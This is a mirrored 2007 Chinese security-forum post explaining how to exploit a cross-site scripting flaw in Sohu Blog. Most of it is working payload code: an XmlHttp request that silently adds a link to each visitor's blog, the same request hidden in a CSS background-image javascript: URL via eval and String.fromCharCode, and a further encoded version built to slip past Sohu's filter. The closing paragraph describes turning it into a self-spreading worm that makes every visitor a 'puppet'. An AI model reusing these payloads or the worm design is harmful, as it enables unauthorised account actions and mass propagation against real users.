返回信息流搜狐博客存在ajax hacking漏洞,可以实现web worm的功能,下面是具体的利用方法:
标准的ajax数据提交,该ajax的XmlHttp方式为微软msdn提供的标准方法!
<script type="text/javascript">
window.onload=function()
{
var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");
XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true);
XmlHttp.send(null);
XmlHttp.onreadystatechange=ServerProcess;
}
function ServerProcess()
{
if (XmlHttp.readystate==4 || XmlHttp.readystate=='complete')
{
alert(XmlHttp.responseText);
}
}
</script>
把以上代码缩成一行
window.onload=function(){var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}
漏洞的利用方式
<div style="background-image:url(javascript:[code])">不能执行多语句,所以转到下面的方法eval进行
<div style="background-image:url(javascript:eval([code]))">有引号,所以转到下面的方法,String.fromCharCode
<div style="background-image:url(javascript:eval(String.fromCharCode([十进制的code])))">这回完成了
在eval里,代码可以自动执行,因此可以不用window.onload,同时去掉函数结构!
var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);
将上述代码进行String.fromCharCode转码
118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59
因此有如下代码,该代码是可以执行的,但会被sohu过滤掉,因此需要进一步加密!
<div style="background-image:url(javascript:eval(String.fromCharCode(118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59)))">
再次加密后的结果!
<div style="BACKGROUND-image:07507206c02806a06107606107306307206907007403a06507606106c02805307407206906e06702e06607206f06d04306806107204306f06406502803103103802c03903702c03103103402c03303202c03803802c03103003902c03103003802c03703202c03103103602c03103103602c03103103202c03603102c03103103002c03103003102c03103103902c03303202c03603502c03903902c03103103602c03103003502c03103103802c03103003102c03803802c03703902c03903802c03103003602c03103003102c03903902c03103103602c03403002c03303402c03703702c03103003502c03903902c03103103402c03103103102c03103103502c03103103102c03103003202c03103103602c03403602c03803802c03703702c03703602c03103003402c03103103602c03103103602c03103103202c03303402c03403102c03503902c03303202c03803802c03103003902c03103003802c03703202c03103103602c03103103602c03103103202c03403602c03703902c03103103202c03103003102c03103103002c03403002c03303402c03103003302c03103003102c03103103602c03303402c03403402c03303402c03103003402c03103103602c03103103602c03103103202c03503802c03403702c03403702c03103003902c03103103102c03103103002c03103203102c03103003102c03103103402c03403602c03903802c03103003802c03103103102c03103003302c03403602c03103103502c03103103102c03103003402c03103103702c03403602c03903902c03103103102c03103003902c03403702c03103003902c03903702c03103103002c03903702c03103003302c03103003102c03403702c03103003802c03103003502c03103103002c03103003702c03403602c03103003002c03103103102c03603302c03103003902c03603102c03903702c03103003002c03103003002c03303802c03103103602c03103003502c03103103602c03103003802c03103003102c03603102c03703702c03103103102c03103103002c03103203102c03103003102c03103103402c03303802c03103003002c03103003102c03103103502c03903902c03603102c03703702c03103103102c03103103002c03103203102c03103003102c03103103402c03303702c03503002c03403802c03103003502c03103103502c03303702c03503002c03403802c03103003902c03103203102c03303702c03503002c03403802c03103003402c03103003102c03103103402c03103103102c03303702c03503002c03403802c03303702c03503002c03403902c03303802c03103003802c03103003502c03103103002c03103003702c03603102c03103003402c03103103602c03103103602c03103103202c03303702c03503102c03603502c03403702c03403702c03103003402c03103003502c03403602c03903802c03903702c03103003502c03103003002c03103103702c03403602c03903902c03103103102c03103003902c03403702c03103003902c03103103102c03103103002c03103203102c03103003102c03103103402c03303802c03903502c03303402c03403402c03103103602c03103103402c03103103702c03103003102c03403102c03503902c03303202c03803802c03103003902c03103003802c03703202c03103103602c03103103602c03103103202c03403602c03103103502c03103003102c03103103002c03103003002c03403002c03103103002c03103103702c03103003802c03103003802c03403102c035039029029029"></div>
加入文章后,访问我空间的人会被自动加上链接,如果再在他的页面加上window.location.href的话,就可以实在蠕虫功能,无限制蔓延,中招的人会成为傀儡,数目也会成几何分布增长知道蔓延到sohu的每一个用户!
这是一条镜像帖。来源:北邮人论坛 / security / #7462同步于 2007/1/13
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
搜狐Blog ajax漏洞分析[转帖]
kissblue
2007/1/13镜像同步2 回复
订阅后,新回复会通过你的通知中心匿名送达。
2 条回复